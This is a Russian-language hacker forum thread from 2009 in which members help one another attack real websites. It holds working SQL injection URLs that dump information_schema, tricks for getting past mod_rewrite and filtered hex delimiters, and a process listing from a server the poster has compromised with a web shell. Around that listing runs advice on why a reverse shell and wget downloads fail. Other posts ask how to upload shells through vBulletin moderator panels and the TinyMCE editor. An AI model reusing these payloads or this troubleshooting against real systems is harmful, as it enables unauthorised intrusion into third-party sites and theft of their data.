Ваши вопросы по уязвимостям.

L I G A · 17 Nov 2009

fng said:

пробовал
комментарии /*, -- и # там не работают

Couldn't execute query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1 -- ))' at line 1
Click to expand...

36))+union+select+1+and+((1
итд...

AFoST · 17 Nov 2009

dArKkNiGHt said:

подскажите, насколько я понимаю, если на сайте включён mod Rewrite, то бесполезно искать уязвимость типа SQL injection ?
к примеру сайт даёт http://site.ru/news/36 но нра самом деле отсюдова идёт реврайт на скрипт http://site.ru/news/index.php?id=36

если же есть способ, озвучьте его, пожалуйста.
Click to expand...

смотря какой модрерайт.
встречаются обходимые
например
http://site.ru/id/1+order+by+1+--+-/

YuNi|[c · 18 Nov 2009

есть SQLi на сайте, версия 4.1.12 MySQL
таблицы брутил со всеми какими есть словарями, но ни одного не нашел. Там помоему префикс какой то. Подскажите есть ли как нибудь брутит префикс или обйти какими то символами?

Roston · 18 Nov 2009

Ну в сипте можно указзывать пути к словарям с префиксами... попробуй ним

fng · 18 Nov 2009

del

ElteRUS · 18 Nov 2009

fng said:

del
Click to expand...

Что del ? =) С ссылки нужно было начинать. Обещаю, что не буду патентовать твою скулю

details.php?id=-36))+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.tables--+

Add: xотя нет, сейчас я соберу хакерскую пресс-конференцию, и оглашу эту скулю всем.

fng · 18 Nov 2009

просто поля подобрал потом)
кстати там почему-то limit не работает...

bons · 18 Nov 2009

limit не будет работать только если это не mysql

Pashkela · 18 Nov 2009

почему, длина строки запроса может быть ограничена просто

mailbrush · 18 Nov 2009

Code:

UID        PID  PPID  C    SZ   RSS PSR STIME TTY          TIME CMD
root         1     0  0   929   580   2 Jun14 ?        00:00:43 init [3]
root         2     0  0     0     0   1 Jun14 ?        00:00:00 [kthreadd]
root         3     2  0     0     0   0 Jun14 ?        00:00:03 [migration/0]
root         4     2  0     0     0   0 Jun14 ?        00:00:00 [ksoftirqd/0]
root         5     2  0     0     0   0 Jun14 ?        00:00:04 [watchdog/0]
root         6     2  0     0     0   1 Jun14 ?        00:00:01 [migration/1]
root         7     2  0     0     0   1 Jun14 ?        00:00:01 [ksoftirqd/1]
root         8     2  0     0     0   1 Jun14 ?        00:00:03 [watchdog/1]
root         9     2  0     0     0   2 Jun14 ?        00:00:01 [migration/2]
root        10     2  0     0     0   2 Jun14 ?        00:00:02 [ksoftirqd/2]
root        11     2  0     0     0   2 Jun14 ?        00:00:03 [watchdog/2]
root        12     2  0     0     0   3 Jun14 ?        00:00:00 [migration/3]
root        13     2  0     0     0   3 Jun14 ?        00:00:01 [ksoftirqd/3]
root        14     2  0     0     0   3 Jun14 ?        00:00:07 [watchdog/3]
root        15     2  0     0     0   0 Jun14 ?        00:04:46 [events/0]
root        16     2  0     0     0   1 Jun14 ?        00:03:05 [events/1]
root        17     2  0     0     0   2 Jun14 ?        00:03:28 [events/2]
root        18     2  0     0     0   3 Jun14 ?        00:04:45 [events/3]
root        19     2  0     0     0   0 Jun14 ?        00:00:00 [khelper]
root        97     2  0     0     0   0 Jun14 ?        00:00:00 [kblockd/0]
root        98     2  0     0     0   1 Jun14 ?        00:00:00 [kblockd/1]
root        99     2  0     0     0   2 Jun14 ?        00:00:00 [kblockd/2]
root       100     2  0     0     0   3 Jun14 ?        00:00:01 [kblockd/3]
root       103     2  0     0     0   1 Jun14 ?        00:00:00 [kacpid]
root       104     2  0     0     0   0 Jun14 ?        00:00:00 [kacpi_notify]
root       247     2  0     0     0   0 Jun14 ?        00:00:00 [ata/0]
root       248     2  0     0     0   1 Jun14 ?        00:00:00 [ata/1]
root       249     2  0     0     0   2 Jun14 ?        00:00:00 [ata/2]
root       250     2  0     0     0   3 Jun14 ?        00:00:00 [ata/3]
root       251     2  0     0     0   2 Jun14 ?        00:00:00 [ata_aux]
root       252     2  0     0     0   0 Jun14 ?        00:00:00 [ksuspend_usbd]
root       257     2  0     0     0   3 Jun14 ?        00:00:00 [khubd]
root       260     2  0     0     0   3 Jun14 ?        00:00:00 [kseriod]
root       333     2  0     0     0   1 Jun14 ?        00:00:00 [pdflush]
root       334     2  0     0     0   3 Jun14 ?        00:26:36 [pdflush]
root       335     2  0     0     0   2 Jun14 ?        00:00:13 [kswapd0]
root       336     2  0     0     0   0 Jun14 ?        00:00:00 [aio/0]
root       337     2  0     0     0   1 Jun14 ?        00:00:00 [aio/1]
root       338     2  0     0     0   2 Jun14 ?        00:00:00 [aio/2]
root       339     2  0     0     0   3 Jun14 ?        00:00:00 [aio/3]
root      1028     2  0     0     0   0 Jun14 ?        00:00:00 [scsi_eh_0]
root      1030     2  0     0     0   1 Jun14 ?        00:00:00 [scsi_eh_1]
root      1032     2  0     0     0   3 Jun14 ?        00:00:00 [scsi_eh_2]
root      1034     2  0     0     0   3 Jun14 ?        00:00:00 [scsi_eh_3]
root      1053     2  0     0     0   0 Jun14 ?        00:00:00 [khpsbpkt]
root      1063     2  0     0     0   1 Jun14 ?        00:00:00 [knodemgrd_0]
root      1101     2  0     0     0   1 Jun14 ?        00:00:00 [kpsmoused]
root      1106     2  0     0     0   0 Jun14 ?        00:00:00 [kondemand/0]
root      1107     2  0     0     0   1 Jun14 ?        00:00:00 [kondemand/1]
root      1108     2  0     0     0   2 Jun14 ?        00:00:00 [kondemand/2]
root      1109     2  0     0     0   3 Jun14 ?        00:00:00 [kondemand/3]
root      1114     2  0     0     0   0 Jun14 ?        00:00:00 [rpciod/0]
root      1115     2  0     0     0   1 Jun14 ?        00:00:00 [rpciod/1]
root      1116     2  0     0     0   2 Jun14 ?        00:00:00 [rpciod/2]
root      1117     2  0     0     0   3 Jun14 ?        00:00:00 [rpciod/3]
root      1120     2  0     0     0   3 Jun14 ?        00:59:16 [md3_raid1]
root      1123     2  0     0     0   0 Jun14 ?        00:00:19 [md2_raid1]
root      1126     2  0     0     0   0 Jun14 ?        00:00:02 [md1_raid1]
root      1128     2  0     0     0   0 Jun14 ?        00:00:00 [reiserfs/0]
root      1129     2  0     0     0   1 Jun14 ?        00:00:00 [reiserfs/1]
root      1130     2  0     0     0   2 Jun14 ?        00:00:00 [reiserfs/2]
root      1131     2  0     0     0   3 Jun14 ?        00:00:04 [reiserfs/3]
root      1225     1  0  3111   848   3 Jun14 ?        00:00:00 /sbin/udevd --daemon
root      1584     1  0 56282 10708   1 Jun19 ?        00:12:28 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
postfix   1663  5338  0  9562  2096   1 08:44 ?        00:00:00 pickup -l -t fifo -u
root      3776     1  0   964   512   1 Jun14 ?        00:00:30 mdadm --monitor --scan --daemonise --pid-file /var/run/mdadm.pid --syslog
apache    4064  1584  0 58211 27936   3 09:39 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4115  1584  0 58229 25840   3 09:40 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4419  1584  0 57307 22596   3 09:46 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4504  1584  0 57704 25460   3 09:48 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4505  1584  0 58098 26584   0 09:48 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root      4521     1  0  3944  1484   1 Jun14 ?        00:03:02 /usr/sbin/syslog-ng
apache    4604  1584  0 57458 24192   3 09:50 ?        00:00:02 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4605  1584  0 57377 21772   3 09:50 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4689  1584  0 57456 22288   3 09:52 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4690  1584  0 57383 22400   3 09:52 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4731  1584  0 58100 24432   2 09:53 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4808  1584  0 57700 24324   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4811  1584  0 57693 22308   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4812  1584  0 58228 26288   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4932  1584  0 57464 20660   3 09:58 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4933  1584  0 58223 23496   3 09:58 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4973  1584  0 58163 25112   3 09:59 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4975  1584  0 57636 21560   3 09:59 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4976  1584  0 57401 23344   3 09:59 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    4978  1584  0 57511 21264   3 09:59 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5037  4731  0  2522   744   3 10:00 ?        00:00:00 ping mail.ru
apache    5044  1584  0 57440 20392   3 10:00 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5045  1584  0 57367 21812   3 10:00 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root      5077     1  0  7797  1040   0 Jun14 ?        00:00:00 /usr/sbin/sshd
apache    5095  1584  0 57260 18820   1 10:01 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5181  1584  0 57322 18292   3 10:03 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5189  1584  0 57254 18496   3 10:03 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
root      5239     1  0  3680  1176   1 Jun14 ?        00:02:11 /usr/sbin/ntpd -p /var/run/ntpd.pid
apache    5281  1584  0 57309 19008   3 10:05 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5321  1584  0 57318 15432   0 10:06 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
apache    5325  4505  0  3656   948   3 10:06 ?        00:00:00 ps -eF
root      5338     1  0  9549  2124   0 Jun14 ?        00:02:19 /usr/lib64/postfix/master
postfix   5360  5338  0  9576  2168   1 Jun14 ?        00:00:19 qmgr -l -t fifo -u
root      5452     1  0  4070   736   0 Jun14 ?        00:01:20 /usr/sbin/cron
root      5519     1  0  1451   680   2 Jun14 tty2     00:00:00 /sbin/agetty 38400 tty2 linux
root      5520     1  0  1451   680   2 Jun14 tty3     00:00:00 /sbin/agetty 38400 tty3 linux
root      5521     1  0  1451   680   3 Jun14 tty4     00:00:00 /sbin/agetty 38400 tty4 linux
root      5522     1  0  1451   684   1 Jun14 tty5     00:00:00 /sbin/agetty 38400 tty5 linux
root      5523     1  0  1451   680   0 Jun14 tty6     00:00:00 /sbin/agetty 38400 tty6 linux
root     29805     1  0  1451   680   2 Jun18 tty1     00:00:00 /sbin/agetty 38400 tty1 linux
apache   31617  1584  0 57632 23972   1 Aug04 ?        00:00:30 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start

Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет?

Spyder · 18 Nov 2009

из этих никакой

Byrger · 18 Nov 2009

Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:

PHP:

http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм

Можно как-то в СИПТ исправить разделители?

SeNaP · 18 Nov 2009

Byrger said:

Есть sql-inj версия БД MySQL 4
Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:

PHP:

http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--

Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм

Можно как-то в СИПТ исправить разделители?
Click to expand...

char(120,115,113,108,105,110,106,98,101,103,105,110)

krypt3r · 18 Nov 2009

mailbrush, что показывает
Code:
/sbin/lsmod | grep ipt
?

Byrger · 18 Nov 2009

Спасибо разобрался сам с 1 вопросом

Сейчас вопрос встал, возможно ли в vBulletin залить шелл через modcp или форум имея права модератора.

hackmen · 18 Nov 2009

Всем привет

Кто нибудь заливал шелл через tiny_mce редактор? Если да, то как это возможно.

Сори если не в тему и заранее сэнк.

fng · 18 Nov 2009

bons said:

limit не будет работать только если это не mysql
Click to expand...

вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

есть у кого предположения почему там так?

Pashkela · 18 Nov 2009

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name
Click to expand...

i'm sorry, а что еще можно пытаться выбрать из information_schema.columns, кроме как column_name? И, самое главное, зачем?

LzD · 18 Nov 2009

mailbrush said:

Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет?
Click to expand...

акромя wget есть и другие качалки.
пропатчить ядро никто не мешал админу- а имя системы можно вообще любое вписать
http://www.opennet.ru/docs/RUS/iptables/

DrAssault · 18 Nov 2009

fng said:

вообще там бред какой-то
поля получается перебирать все из information_schema, а просто по таблицам нет

т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

есть у кого предположения почему там так?
Click to expand...

Дай ссылочку, глянем

Ваши вопросы по уязвимостям.

L I G A Banned

AFoST Elder - Старейшина

YuNi|[c Elder - Старейшина

Roston Elder - Старейшина

fng New Member

ElteRUS Elder - Старейшина

fng New Member

bons Elder - Старейшина

Pashkela Динозавр

mailbrush Well-Known Member

Spyder Elder - Старейшина

Byrger Elder - Старейшина

SeNaP Elder - Старейшина

krypt3r Elder - Старейшина

Byrger Elder - Старейшина

hackmen Banned

fng New Member

Pashkela Динозавр

LzD Banned

DrAssault Member

Useful Searches

Ваши вопросы по уязвимостям.

L I G A Banned

AFoST Elder - Старейшина

YuNi|[c Elder - Старейшина

Roston Elder - Старейшина

fng New Member

ElteRUS Elder - Старейшина

fng New Member

bons Elder - Старейшина

Pashkela Динозавр

mailbrush Well-Known Member

Spyder Elder - Старейшина

Byrger Elder - Старейшина

SeNaP Elder - Старейшина

krypt3r Elder - Старейшина

Byrger Elder - Старейшина

hackmen Banned

fng New Member

Pashkela Динозавр

LzD Banned

DrAssault Member